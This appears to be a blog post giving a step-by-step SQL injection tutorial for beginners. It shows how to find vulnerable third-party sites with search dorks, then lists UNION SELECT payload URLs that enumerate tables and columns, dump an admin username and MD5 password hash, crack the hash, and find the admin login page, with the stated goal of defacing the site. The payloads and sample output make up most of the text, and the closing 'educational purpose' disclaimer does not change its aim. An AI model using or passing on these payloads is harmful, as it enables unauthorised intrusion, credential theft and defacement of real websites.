Hack Website with Sql Injection for Noobs
SQL Injection Tutorial! 100% NOOB FRIENDLY!!
Hi, this tutorial covers all your basic SQL Injection
needs. After reading this, you should be able to
successfully retrieve Database information such as
the username and password that are crucial for
defacing sites.
Lets start.
What is SQL Injection?
is a code injection technique that exploits a security
vulnerability occurring in the database layer of an
application (like queries). The vulnerability is present
when user input is either incorrectly filtered for string
literal escape characters embedded in SQL
statements or user input is not strongly typed and
thereby unexpectedly executed. It is an instance of a
more general class of vulnerabilities that can occur
whenever one programming or scripting language is
embedded inside another. SQL injection attacks are
also known as SQL insertion attacks.
Source
Step 1: Choose Your Target:
Of course, you can’t SQL Inject nothing. You must
have a website as a target. Remember, only vulnerable
sites are able to be injected into. You can’t just SQL
Inject any site *sigh*.
So how do we see which sites are vulnerable? There
are many lists of vulnerable sites out there. But if you
wish to find them manually, read on.
Dorks
Wtf is this? These are “Dorks” that you can use to
find vulnerable sites. Go to Google and simply copy
and paste one of those dorks and click search.
I personally recommend going here (scanner seems to
be down) to see which sites are vulnerable, but if you
wish to do THAT manually also, read on. If not, skip
to
Step 2.
After you have Googled the dorks, click on any site.
To check the site for vulnerability, simply add a “‘” to
the end of the URL (without the quotes). It should
look somewhat like this:
Code:
http://www.sitename.com/main.php?id=232′
If the page simply refreshes, the site is not
vulnerable. But if an error of any kind pops up, the
site is prone to SQLi. When you have successfully
found a vulnerable site, proceed to
Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need
to find the vulnerable columns.
Add this to the end of the URL:
Code:
http://www.sitename.com/main.php?id=232 order by
1–
Now here’s where it gets tougher (not really). You
have to look for errors as you enter new numbers.
For example:
Code:
http://www.sitename.com/main.php?id=232 order by
1– (no error)
http://www.sitename.com/main.php?id=232 order by
2– (no error)
http://www.sitename.com/main.php?id=232 order by
10– (ERROR!)
http://www.sitename.com/main.php?id=232 order by
5– (no error)
http://www.sitename.com/main.php?id=232 order by
6– (ERROR!)
The goal here is to find the least column the shows
the error. As you can see in the example, the lowest
column that we found an error on is column 6,
therefore, column 6 doesn’t exist and there are only 5
columns.
Now we have to find which one of these five columns
(it may be different in your case) is vulnerable, to do
that, add this code to the end of the URL:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,4,5–
Make sure to include the – in the beginning and the
— at the end, this is crucial. Remember that the code
above may be different in your case regarding how
many columns there are.
Now, if you see numbers on the screen. You can
proceed. The very first number is the number of the
vulnerable column. If the number is “4” that means
that the 4th column is the vulnerable column.
Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we
will be editing.
Assuming that the vulnerable column is 4 (it may be
different in your case), proceed to find the version
number. To find the version number, replace the
vulnerable column with “@@version” like this:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,@@version,5–
If the version is 5 or above, proceed. If not, it will be
harder to hack. There are other tutorials covering
how to hack database versions 4 or lower.
Now we must find the database name. To do this,
replace the “@@version” from before with “concat
(database())” like this:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,concat(database()),5–
And BOOM! The database name should appear on
your screen. Copy this somewhere safe, we will need
this for later.
Step 4: Obtain Table Names
We are almost done, don’t give up just yet.
Now we have to find the table names. This is crucial
because the tables contain all of the information that
we may need. Some hackers look for credit card
information and e-mail adresses, but in this tutorial
we will be looking to retrieve the username and
password in order to deface the site.
Edit the code as follows:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,group_concat(table_name),5 from
information_schema.tables where
table_schema=database()–
Now, names appear. Look for obvious names hinting
to tables where user information can be stored. You
are looking for table names such as “Admin”, “Users”,
“Members”, “Admin_Id”, Admin_pass”, “User_id”, etc..
The last character is chopped off? Don’t worry. Count
how many tables you can see, then add this code
based on the tables that you can see. We will be
assuming that the last table you can see is the 8th
table.
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,table_name,5 from
information_schema.tables where
table_schema=database() limit 8,1–
This code is to view the 9th table. Replace the 8 with
a 9 to view the 10th table, and so on until you find
the table that you think has the most crucial
information.
When you find the table, copy the name somewhere
safe. We will need both the database and table
names for the next step.
For this tutorial, we will be using the table name of
“admin”.
Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3
To find the column names, add this to the end of the
URL:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,group_concat(column_name),5 from
information_schema.columns where
table_name=”admin”–
Didju get an error? OH NO! YOU FAIL. Choose another
site. Just kidding.
Go here and type in your table name where is says
“Say Hello to My Little Friend”.
In my case, this is the string that I got after I
inputted “admin” to the input space:
Code:
61646d696e
Now, replace the table name with hex as so:
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,group_concat(column_name),5 from
information_schema.columns where
table_name=0x61646d696e–
Notice how I added the “0x”, that is to indicate that
hex is being used. Remember to get rid of the quotes.
Now after you enter this code, you should see where
all the juicy information is contained. An example of
what you should see is:
Code:
Admin_Username, Admin_Pass, Admin_credentials,
User_credentials, Members, etc..
Now say you want to view what is in the
“Admin_Username” and the “Admin_pass”, add this
code (in this example we will be using “database” as
the database name and “admin” for the table name):
Code:
http://www.sitename.com/main.php?id=-232 union
select 1,2,3,group_concat
(Admin_Username,0x3a,Admin_Pass),5 FROM
database.admin–
The “0x3a” will put a colon to where the information
will be separated. You should get something like this:
Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e
The username is “MyName” and the password is..
WAIT! That is MD5, crack this using Havij. Download
Havij here.
Now as you can see. This is the login info:
Code:
Username: MyName
Pass: 123456
Now all you have to do is find the admin page, which
is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will
find you the admin page.
Thanks for reading my first tutorial for u to Hacking a Website but only for Educational purpose I am not responsibe for any illegal activity done by you if u Need any help then Comment below Malik ubi...
Post A Comment
No comments :